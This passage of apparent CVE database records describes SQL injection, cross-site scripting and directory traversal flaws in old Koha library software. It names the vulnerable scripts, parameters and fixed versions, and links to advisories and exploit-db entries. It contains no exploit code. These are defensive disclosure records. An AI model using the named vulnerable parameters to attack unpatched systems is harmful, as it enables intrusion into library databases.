"value": "SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-24T16:42:51",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-1925",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://koha-community.org/security-release-february-2014/",
"refsource": "MISC",
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"name": "http://www.openwall.com/lists/oss-security/2014/02/07/10",
"refsource": "MISC",
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"name": "http://www.openwall.com/lists/oss-security/2014/02/10/3",
"refsource": "MISC",
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666",
"refsource": "MISC",
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-1925",
"datePublished": "2020-01-24T16:42:51",
"dateReserved": "2014-02-09T00:00:00",
"dateUpdated": "2024-08-06T09:58:15.638Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2014-9446 (GCVE-0-2014-9446)
Vulnerability from cvelistv5
Published
2015-01-02 20:00
Modified
2024-09-16 18:54
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl.
References
| ▼ | URL | Tags |
|---|---|---|
| http://koha-community.org/koha-3-16-6-release/ | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/71803 | vdb-entry, x_refsource_BID | |
| http://koha-community.org/koha-3-18-2-release/ | x_refsource_CONFIRM | |
| http://secunia.com/advisories/61187 | third-party-advisory, x_refsource_SECUNIA | |
| http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T13:47:41.022Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://koha-community.org/koha-3-16-6-release/"
},
{
"name": "71803",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/71803"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://koha-community.org/koha-3-18-2-release/"
},
{
"name": "61187",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/61187"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2015-01-02T20:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://koha-community.org/koha-3-16-6-release/"
},
{
"name": "71803",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/71803"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://koha-community.org/koha-3-18-2-release/"
},
{
"name": "61187",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/61187"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-9446",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://koha-community.org/koha-3-16-6-release/",
"refsource": "CONFIRM",
"url": "http://koha-community.org/koha-3-16-6-release/"
},
{
"name": "71803",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/71803"
},
{
"name": "http://koha-community.org/koha-3-18-2-release/",
"refsource": "CONFIRM",
"url": "http://koha-community.org/koha-3-18-2-release/"
},
{
"name": "61187",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/61187"
},
{
"name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425",
"refsource": "CONFIRM",
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-9446",
"datePublished": "2015-01-02T20:00:00Z",
"dateReserved": "2015-01-02T00:00:00Z",
"dateUpdated": "2024-09-16T18:54:07.207Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2015-4633 (GCVE-0-2015-4633)
Vulnerability from cvelistv5
Published
2018-10-18 20:00
Modified
2024-08-06 06:18
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface.
References
| ▼ | URL | Tags |
|---|---|---|
| https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426 | x_refsource_CONFIRM | |
| https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html | x_refsource_MISC | |
| https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412 | x_refsource_CONFIRM | |
| https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ | x_refsource_MISC | |
| https://koha-community.org/security-release-koha-3-16-12/ | x_refsource_CONFIRM | |
| https://www.exploit-db.com/exploits/37387/ | exploit, x_refsource_EXPLOIT-DB | |
| https://seclists.org/fulldisclosure/2015/Jun/80 | mailing-list, x_refsource_FULLDISC | |
| https://koha-community.org/security-release-koha-3-18-8/ | x_refsource_CONFIRM | |
| https://koha-community.org/security-release-koha-3-20-1/ | x_refsource_CONFIRM | |
| https://koha-community.org/koha-3-14-16-released/ | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T06:18:12.102Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"name": "37387",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/37387/"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-06-25T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-18T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"name": "37387",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/37387/"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-4633",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426",
"refsource": "CONFIRM",
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
},
{
"name": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html",
"refsource": "MISC",
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412",
"refsource": "CONFIRM",
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
},
{
"name": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/",
"refsource": "MISC",
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"name": "https://koha-community.org/security-release-koha-3-16-12/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"name": "37387",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/37387/"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"name": "https://koha-community.org/security-release-koha-3-18-8/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"name": "https://koha-community.org/security-release-koha-3-20-1/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"name": "https://koha-community.org/koha-3-14-16-released/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/koha-3-14-16-released/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-4633",
"datePublished": "2018-10-18T20:00:00",
"dateReserved": "2015-06-16T00:00:00",
"dateUpdated": "2024-08-06T06:18:12.102Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2015-4631 (GCVE-0-2015-4631)
Vulnerability from cvelistv5
Published
2018-10-18 20:00
Modified
2024-08-06 06:18
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T06:18:12.212Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"name": "37389",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/37389/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-06-25T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-18T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"name": "37389",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/37389/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-4631",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html",
"refsource": "MISC",
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418",
"refsource": "CONFIRM",
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
},
{
"name": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/",
"refsource": "MISC",
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"name": "37389",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/37389/"
},
{
"name": "https://koha-community.org/security-release-koha-3-16-12/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423",
"refsource": "CONFIRM",
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"name": "https://koha-community.org/security-release-koha-3-18-8/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"name": "https://koha-community.org/security-release-koha-3-20-1/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416",
"refsource": "CONFIRM",
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
},
{
"name": "https://koha-community.org/koha-3-14-16-released/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/koha-3-14-16-released/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-4631",
"datePublished": "2018-10-18T20:00:00",
"dateReserved": "2015-06-16T00:00:00",
"dateUpdated": "2024-08-06T06:18:12.212Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2014-1923 (GCVE-0-2014-1923)
Vulnerability from cvelistv5
Published
2020-01-24 16:42
Modified
2024-08-06 09:58
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://koha-community.org/security-release-february-2014/ | x_refsource_MISC | |
| http://www.openwall.com/lists/oss-security/2014/02/07/10 | x_refsource_MISC | |
| http://www.openwall.com/lists/oss-security/2014/02/10/3 | x_refsource_MISC | |
| http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661 | x_refsource_MISC | |
| http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:58:15.695Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-02-07T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-24T16:42:42",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
